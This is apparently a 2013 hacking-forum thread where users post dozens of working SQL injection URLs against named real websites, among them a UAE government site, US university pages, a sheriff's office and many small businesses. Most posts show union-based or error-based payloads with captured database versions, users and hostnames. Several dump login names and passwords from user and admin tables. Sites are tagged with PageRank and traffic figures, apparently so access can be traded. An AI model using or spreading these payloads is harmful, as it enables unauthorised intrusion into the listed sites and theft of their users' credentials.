13.07.2013, 13:44
http://gagra-picunda.ru/page.php?id=2&np=3&obj=-1+and+1=1+union+select+1,2,3,versioN(),5,6,7,8,9--
traffic 1k
GOV
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
5.1.70-CLL:STCGOVAE_STC@LOCALHOST:STCGOVAE_DATA
pharm_all
13.07.2013, 22:17
Edu's
http://www.uh[dot]edu/about/tier-one/faculty-opportunities/awards-details.php?id=37 %SQL%
http://www.katrinalist.columbia[dot]edu/details.php?id=242 %SQL%
http://www.engr.utk[dot]edu/~cee/announcements/details.php?id=27 %SQL%
http://www.earth.columbia[dot]edu/eidirectory/displayuser.php?userid=626 %SQL%
pharm_all said:
Edu's
Code:
http://www.uh.edu/about/tier-one/faculty-opportunities/awards-details.php?id=-37+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--
5.1.69:facultyaward@hwfwrv001.web.e.uh.edu:faculty awards
Code:
http://www.katrinalist.columbia.edu/details.php?id=-242+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
4.1.22-log:katrina_user@192.168.100.10:katrina
Code:
http://www.engr.utk.edu/~cee/announcements/details.php?id=-27+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15--
5.0.95-log:civil@babel.usg.utk.edu:civil
http://
www.aboutrsi.org
/history.php?ID=-13+union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(caadrsdb.users)where(0x0 0)in(@x:=concat(@x,0x3c62723e,username,0x3a,passwo rd))))x),3,4,5,6,7 --+
==========================================
http://
www.animalcentury.com
/rubric.php?id=-9+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5,6,7--+
==========================================
http://
www.svite.lt
/rubric.php?id=-71+union+select+1,2,3,4,5,6,7,8,9,(select(@x)from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),11,12,13,14,15,16,17 --+
==========================================
pr=4
http://
www.afu.org.ua
/rubric.php?id=-21+union+select+concat(user(),0x3a,version(),0x3a, database()),2,3,4,5,6,7 --+
==========================================
Code:
http://cgl-gabon.com/?p=ref&cat=2&scat=5&ref=-6+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10--
1111
http://www.shar-e. com/newsDetail.php?id=-78/**/union/**/select/**/1,concat_ws(user(),database(),version() ),3,4,5,6--
http://www.oceansurf.ca/gallery.php?id=-16/**/union/**/ select/**/1 ,concat_ws(user(),database(),version())--
http://www.me lbournefineart.com.au/gallery.php?id=-18/**/union/** /select/**/1,concat_ws(user(),database(),version()),3,4,5--
http://ww w.si mplytobago.co.uk/gallery.php?id=-47/**/union/**/s elect/**/1,2 ,3,4,5,concat_ws(user(),database(),version()),7--
http://www.cor doga nclark.com/newsitem.php?id=-8/**/union/* */select/**/1,2,3,concat_ws(user(),database(),version()) ,5,6--
http://www.sdarabia.com/preview_staff.php?staff_id=-36/ **/unio n/* */select/**/1,c oncat_ws(user(),database(),version()),3,4,5,6--
http://www.the fireworksfirm.co.uk/new sitem.php?id=-220/**/ union/**/select/**/1,2,3,4,5,concat_ws(user(),database(),version()) ,7,8,9--
http://www.bailey -caravans.co.uk/information-centre/latest-news/newsitem.php?recordid=-225/** /union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7 ,8,9,10,11,12,13--
http://www.eastsom ersetrailway.com /newsitem.php?item=-16/**/union/**/s elect/**/1,concat_w s(user(),database(),version()),3,4,5,6,7,8,9,10--
http://www.faresav er.co.uk/newsitem.php?i=-9462599/**/union/ **/select/**/1,2,3,concat_ws(user(),database(),version()),5,6--
http://www.baileyofbristol.co.uk/whats-new/latest-news/newsit em.php?recordid=-290/**/union/**/select/**/1,concat_ws(user(),database(),version()),3, 4,5,6,7,8,9,10,11,12,13--
http://www. bradleys-blyth.co.uk/readne ws.php? newsid=-25/**/u nion/**/select/**/1,2,user(),4,5,6,7,8,9--
http://mostaloc alcouncil .com/readnews.php?id=-32/**/union/* */select/**/1,concat_ws(user(),database(),version()),3,4,5--
http://www .coreycoxmusic.com/newsitem.php?id=-4/**/un ion/**/select/**/1,2,concat_ws(user(),database(),version()),4,5--
http://www.irishsanghatrust.ie/news.php?id=-33/**/un ion/**/s elect/**/1,concat_ws(user(),database(),version()),3,4,5, 6,7,8,9,10,11,12 ,13,14,15,16,17,18--
http://www.pt.ncku.edu.tw/newsone.php?newS o=-36/**/union /**/select/**/1, 2,concat_ws(user(),database(),version()),4,5,6,7--
1111
http://web-job.ru/about_vakansii.php?id=5022-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://pr-ic.ru/sel.php/?url=brocker.pro-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://rating-brokers.com/index.php?option=com_videoflow&task=play&id=659-999.9+union+select+1,2,3,4-- [0:0]
http://imperiafilm.ru/details.php?id=183-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18-- [0:0]
http://www.martial-arts.com.ua/view_news.php?id=269-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://fifa13center.ru/modules/forum/topic.php?id=2&last=Y-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://ramu.ru/news-details.php?id=7409-999.9+union+select+1,2,3,4-- [0:0]
http://www.star.poltava.ua/index.php?id=2&set_lang=ru-999.9+union+select+1,2,3,4-- [0:0]
http://fifa4stars.ru/game.php?id=46192-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16-- [0:0]
http://mashintop.ru/articles.php?id=24-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://dro4a.org/view_video.php?id=762-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- [0:0]
http://www.tit.by/stat.php?id=12863-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24-- [0:0]
http://www.news-ru.com/index.php?id=80227-999.9+union+select+1,2,3,4,5,6,7-- [0:0]
http://www.orikipoteka.ru/menu.php?id=47-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://ipoteka.obmen.ru/articles.php?id=2-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
pr=3
http://
www.adhesia.be
/template.php?t=nl&m=digimagazines&f=laatste&id=-84'+union+select+1,2,version(),4,5,6,group_concat( table_name),8,9+from+information_schema.tables+whe re+table_schema=database() --+
==========================================
pr=1
http://
www.lagerwerf.nl
/public.php?ID=7426+or+1+group+by+concat((select+ve rsion()),0x3a,database(),0x3a,user(),floor(rand(0) *2))+having+max(0) --+
==========================================
pr=3
http://
www.hfc-chemicals.com
/public.php?id=-4+union+select+1,2,(select(@x)from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),4 --+
==========================================
http://www.nassnig. org/nass/news.php?id=-452/**/union/**/select/**/1, 2,3,4,concat_ws(user(),database(),version()),6,7,8--
http://www.threedomsolutions.co.uk/news.php?id=-54/**/union/* */select/**/1,2,concat_ws(user() database(),version()),4,5,6,7--
http://www.vital-technology.net/News.php?ID=-124/**/u nion/**/select/**/1,2,3,concat_ws(user(),database(),version()),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24--
http://charliemars.com/news.php?id=-165/**/union /**/select/**/1,2,concat_ws(user(),data base(),version()),4,5,6--
http://www.nightgallery.ca/event.php?id=-78/**/union/**/s elect/**/1,concat_ws(user(),database(),version()),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29--
http://www.intergeneration.be/contactmanager/preview.php?id=-2/**/union/**/s elect/**/1,2,3,4,5,6,7,8,concat_ws(us er(),database(),version()),10,11,12--
http://www.zigzagweeklynews.com/opinions.php?ID=-2496/**/union/**/select/**/1,conc at_ws(user(),database(),version()),3 ,4,5,6,7,8,9,10,11,12--
http://www.groupeone.eu/preview.php?id=-46/**/union/**/ select/**/1,concat_ws(user(),database(), version())--
http://www.mamacassng.com/pages.php?id=-10/**/unio n/**/select/**/1,concat_ws(user() ,database(),version()),3,4,5,6,7,8,9,10--
1111
pr=3
http://
www.glenlakesrealty.com
/public.php?id=-3'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( 0x3c62723e,name,char(58),pass),12,13,14,15,16,vers ion(),18,19+from+residents --+
==========================================
http://
www.riverariveralaw.com
/Spanish/publication.php?id=-4'+union+select+1,(select(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5 --+
==========================================
http://
www.nlpvf.nl
/book/sign.php?id=-50+union+select+1,2,version(),4,5,(select(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),7,8,9,10,11,12,13,14 --+
==========================================
http://
www.franklinoutdoor.com
/sign.php?id=-31+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27 --+
==========================================
http://
www.poshuk-rc.com
/publication.php?id=48)+or+1+group+by+concat((selec t+version()),0x3a,database(),0x3a,user(),floor(ran d(0)*2))+having+max(0) --+
==========================================
http://
www.docudisp.ch
/en/home/publication.php?id=-609+union+select+1,group_concat(table_name),3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16+from+informat ion_schema.tables+where+table_schema=database() --+
==========================================
http://
www.cordilleranorth.com
/publication.php?ID=-7+union+select+1,2,3,4,version(),6,7,8,9,10,(selec t(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),12,13 --+
==========================================
http://
www.sastm.org.za
/publication.php?id=-14+union+select+group_concat(user,0x3a,pass),2,3,4 ,5,6,7,8+from+users --+
==========================================
HAHAHA.DE
MySQL Error-Based Duplicate entry query: version()
Code:
http://www.hahaha.de/?v=1%22%20AND%20%28SELECT%205546%20FROM%28SELECT%2 0COUNT%28%2A%29%2CCONCAT%280x7169737271%2C%28MID%2 8%28IFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2 C0x20%29%29%2C1%2C50%29%29%2C0x7170696871%2CFLOOR% 28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHE MA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20 %22JzYK%22%3D%22JzYK
output:
Array ( [0] => Fehler in der Abfrage.Duplicate entry 'qisrq5.1.66-0+squeeze1qpihq1' for key 'group_key' )
5.1.66-0+squeeze1
Code:
http://www.skikarte.si/buy.php?id=-57+union+select+1,concat_ws(0x3a,version(),user(), database()),3--
UP
pr = 2
http://
www.u-need.de
/main.php?id=33+and+(select 1 from(select count(*),concat(version(),0x3a,user(),0x3a,databas e(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
pr = 5 TIC = 10
http://
www.wdcb.org
/programming/programs.php?id=17' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
HTML:
http://segway-city.ru/accessories/acc.php?id=11111111+union+select+1,version%28%29,3 ,4,5,6,7,8,9,10,11,12 --
Unknowhacker
29.07.2013, 23:54
Code:
http://doska.crimeahouse.net/ind.php?pn=7&id_typ=6+union+select+1,password,user,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user
crimeaho_admin'@'localhost
Code:
http://www.wcasi.com/programs.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,101,11,12--
Code:
http://decoristick.ru/newsDetail.php?id=999999.9+union+all+select+0x7c,( select+concat(0x7c,(users.id),0x7c,(users.login),0 x7c,(users.password),0x7c,(users.email))+from+`u22 1699`.users+order+by+ID+limit+0,1),0x7c,0x7c,0x7c --
Unknowhacker
06.08.2013, 13:38
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+
5.0.83-community
Code:
http://www.z-man.com.au/articles.php?id=-158+union+select+1,2,3,4,user%28%29,6,7+--+
zmancom4_dbadmin@localhost
Code:
http://www.chwb.org/regional/news.php?id=63+union+select+version%28%29,2+--+
5.1.62-cll
el43.ru
PHP:
http://el43.ru/tovar_v.php?ID=13+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
www.tv-video.ru
PHP:
http://www.tv-video.ru/?action=goods_view&id=20+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
progman-soft.ru
PHP:
http://progman-soft.ru/helptxt/kadr/spr.php?id=30+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
piknik.net.ua
PHP:
http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
nemaniak
08.08.2013, 14:10
eastbayscore.org PR-5 Alexa-49k
Code:
http://eastbayscore.org/event.php?parent_id=-22+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9+--+
Code:
5.0.96-log:scorecms@50.63.196.13:scorecms
entsweb.ltd.uk Alexa-474k
Code:
http://entsweb.ltd.uk/jobs.php?pageid=jobs&category=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,concat _ws(0x3a,version(),user(),database()),12,13,14,15, 16,17,18+--+
Code:
5.0.96-community:entswebl_webouse@localhost:entswebl_webo
eqtraders.com Alexa-206k
Code:
http://eqtraders.com/items/show_item.php?item=-22833+UNION+SELECT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,101,102,103,104,105,106,107,108,109,110,111,112 ,113,114,115,116,117,118+--+
Code:
5.0.96-community:eqtrader_eqread@localhost:eqtrader_main
stluciesheriff.com Alexa-346k PR-5 sheriffland
Code:
http://stluciesheriff.com/news_article.php?news_id=-741+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7+--+
Code:
5.1.24-rc-log:slcsheriff@pakhet.kattare.com:slcsheriff
www.prom-info.com
PHP:
http://www.prom-info.com/index.php?m=4&id=49+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.lkm.kiev.ua
PHP:
http://www.lkm.kiev.ua/index.php?R=catalog&id=76+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
cellfaktor.ru
PHP:
http://cellfaktor.ru/catalogtovar.php?cat=7&tov=31&id=120+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
new.vodaspb.ru
PHP:
http://new.vodaspb.ru/note.php?id=131+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:20||PR:0
==================================================
cool-cook.ru
PHP:
http://cool-cook.ru/content/?id=145+or+1+group+by+concat((select+0x76657273696 f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+ 1--+
db 5 version
CY:0||PR:1
==================================================
www.dcmagazine.ru
PHP:
http://www.dcmagazine.ru/journal.html?id=7%0D%0A+or+1+group+by+concat((sele ct+0x76657273696f6e73716c),0x00,floor(rand(0)*2))h aving+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
koral-chelny.ru
PHP:
http://koral-chelny.ru/otzyvy.php?id=3+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
http://
www.vila-verde.org.br
/not.php?id=272+union+select+1,2,3,4,5,6,concat(ver sion(),0x3a,user(),0x3a,database()),8,9,10,11,12,1 3,14,15 --+
==========================================
http://
www.wenhastonarchive.org.uk
/historynotes/note.php?id=-31'+union+select+1,2,3,version(),count(userid),6 from users --+
==========================================
http://
www.westcoastdreamca.com
/note.php?id=1+union+select+1,version(),(select(@x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6 --+
==========================================
pr=3
http://
www.seriedelcaribe2013.com.mx
/detalle-not.php?id=709 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
blind, mysql version 5, first letter of the database name is i
http://
www.ics.gencat.cat
/butlleti_medicaments/public/view-not.php?ID=7&idnot=58' and(substr(version(),1,2)=5) and '1 --+
==========================================
www.wgabus.ru
PHP:
http://www.wgabus.ru/?id=4+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 4 version
CY:60||PR:2
==================================================
www.lada110atricom.ru
PHP:
http://www.lada110atricom.ru/index.php?content=word_all&id=6+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
soctech.ru
PHP:
http://soctech.ru/index.php?module=articles&file=article&id=1+and(select+1+from(select+count(*),concat((sel ect+0x76657273696f6e73716c),0x00,floor(rand(0)*2)) x+from+information_schema.tables+group+by+x)a)--+
db 5 version
CY:30||PR:1
==================================================
http://
www.aceas.co.in
/content.php?id=-9+/*!union*/+/*!select*/+1,2,3,version(),5,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(0)from(aceasco_aceas.adminmaster)where(0x00)in(@x :=concat(@x,0x3c62723e,adminUsername,0x3a,adminPas sword))))antichat),7,8,9,10,11,12,13,14,15 --+
==========================================
http://
www.chs.mak.ac.ug
/mumsa/content.php?id=-72+union+select+1,2,3,4,(select(@x)from(select (@x:=0x00),(select(0)from(mak_chs_mumsa.members)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,email,0x3a,pa ss))))x),6,7,8,9 --+
==========================================
http://
www.es.romana.org
/not.php?n=42&s=8.0&ID=1&cita=-11+union+select+group_concat(table_name)+from+info rmation_schema.tables+where+table_schema=database( ) --+
==========================================
www.kso-ekb.ru
PHP:
http://www.kso-ekb.ru/service.php?id=2+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.creasol.ru
PHP:
http://www.creasol.ru/print.php?id=5+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:30||PR:3
==================================================
www.akrealt.kz
PHP:
http://www.akrealt.kz/index.php?page=premises_detail&id=5+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
country.tj
PHP:
http://country.tj/index.php?c=news&id=3+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.malikov-art.ru
PHP:
http://www.malikov-art.ru/projects.html?id=3+or+1+group+by+concat((select+0x 76657273696f6e73716c),0x00,floor(rand(0)*2))having +min(0)+or+1--+
db 5 version
CY:40||PR:3
==================================================
www.zhemkov.ru
PHP:
http://www.zhemkov.ru/index.php?rub=katalog&id=6+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
avi-mp3.ru
PHP:
http://avi-mp3.ru/go/?id=8+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.uezdniigorod.ru
PHP:
http://www.uezdniigorod.ru/article.php?id=9+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
pyatoe.ru
PHP:
http://pyatoe.ru/feedback/otzyvy/?id=13+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
Unknowhacker
09.08.2013, 22:42
Tonis TV channel
Code:
http://www.tonis.ua/index.pl?page=forum&id=-871%27+union+select+1,2,3,4,5,6,version%28%29,8+--+
5.1.66-0+squeeze1-log
Code:
http://www.henryyanart.com/product.php?id=-1+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11--
www.pyatoe.ru
PHP:
http://www.pyatoe.ru/feedback/otzyvy/?id=15+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
elisavetgrad.ho.ua
PHP:
http://elisavetgrad.ho.ua/View_video.php?id=17+or+1+group+by+concat((select+ 0x76657273696f6e73716c),0x00,floor(rand(0)*2))havi ng+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.atamura.kz
PHP:
http://www.atamura.kz/view_news.php?id=20+or+1+group+by+concat((select+0 x76657273696f6e73716c),0x00,floor(rand(0)*2))havin g+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
soyuzpisateley.ru
PHP:
http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:400||PR:5
==================================================
www.citymt.ru
PHP:
http://www.citymt.ru/product/firm.php?id=1+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.clip-touristic.com
PHP:
http://www.clip-touristic.com/index.php?id=28&tour_id=194+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:2
==================================================
www.teleorakul.com
PHP:
http://www.teleorakul.com/actor?id=32+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:1
==================================================
www.novotorg.ru
PHP:
http://www.novotorg.ru/catalog/?id=1+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:40||PR:2
==================================================
www.nord-lk.ru
PHP:
http://www.nord-lk.ru/kabinet_view.php?id=2+or+1+group+by+concat((select +0x76657273696f6e73716c),0x00,floor(rand(0)*2))hav ing+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.fabrica33.ru
PHP:
http://www.fabrica33.ru/index.php?id=2&cat=2+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
ForcePush
10.08.2013, 18:28
http://
www.intro-inferno.com/news.php?id=180+AND+1=0+UNION+SELECT+1,user_name,3 ,4,5,user_pass,7,8,9+FROM+prod_intro_users
PR 2
www.mebeltoday.ru
PHP:
http://www.mebeltoday.ru/index.php?pl=rprice&id=5+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
h-rod.ru
PHP:
http://h-rod.ru/teach.php?id=5+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:20||PR:
==================================================
www.realtynavigator.ru
PHP:
http://www.realtynavigator.ru/index.php?whosend=detail&lng=ru&id=8+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
Code:
http://webproverka.com/index-list_sites.php?sort=-23+union+select+1,concat_ws(0x3a,version(),user(), database(),0x4861636b6564206279205365706f),3,4,5,6 ,7,8--
www.minato.ru
PHP:
http://www.minato.ru/view.php?CID=4&ID=10+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
www.darsil.ru
PHP:
http://www.darsil.ru/?id=10+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:50||PR:2
==================================================
koral-kazan.ru
PHP:
http://koral-kazan.ru/otzyvy.php?id=10+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.mezzatorre.it
PHP:
http://www.mezzatorre.it/ru/camera.php?id=10+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:140||PR:3
==================================================
www.rusradiokrasnodar.ru
PHP:
http://www.rusradiokrasnodar.ru/gallery/?id=10+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:30||PR:1
==================================================
wszmk.ru
PHP:
http://wszmk.ru/index.php?id=13&ntable=46&pg_nom=43+or+1+group+by+concat((select+0x766572736 96f6e73716c),0x00,floor(rand(0)*2))having+min(0)+o r+1--+
db 5 version
CY:30||PR:3
==================================================
www.mallorcarusskaya.ru
PHP:
http://www.mallorcarusskaya.ru/playas.php?id=14+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:0||PR:
==================================================
otpusk21.com
PHP:
http://otpusk21.com/modul.php?id=14+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.promind.ru
PHP:
http://www.promind.ru/shop/model.php?id=14+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:90||PR:2
==================================================
shop.duplet.com.ua
PHP:
http://shop.duplet.com.ua/index.php?R=catalog&id=15+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.discoverytour.ru
PHP:
http://www.discoverytour.ru/?id=16+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
www.ta-mp.ru
PHP:
http://www.ta-mp.ru/?page=tours&rem=sea&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
equator.ulagr.com
PHP:
http://equator.ulagr.com/articles/detail&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
sport-dom.com
PHP:
http://sport-dom.com/index.php?main_page=news_manager_all_news&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
3musk.ulagr.com
PHP:
http://3musk.ulagr.com/articles/detail&id=17+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
as-event.ru
PHP:
http://as-event.ru/blog/?id=19+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.severus-mebel.ru
PHP:
http://www.severus-mebel.ru/index.php?menu=catalog&task=select_item&groupID=0&cond=0&catID=0&ID=21&savedID=5&what=0&itemID=6291+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:0
==================================================
liderprice.com.ua
PHP:
http://liderprice.com.ua/list_goods.php?cid=8&id=21+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.rielty-plus.ru
PHP:
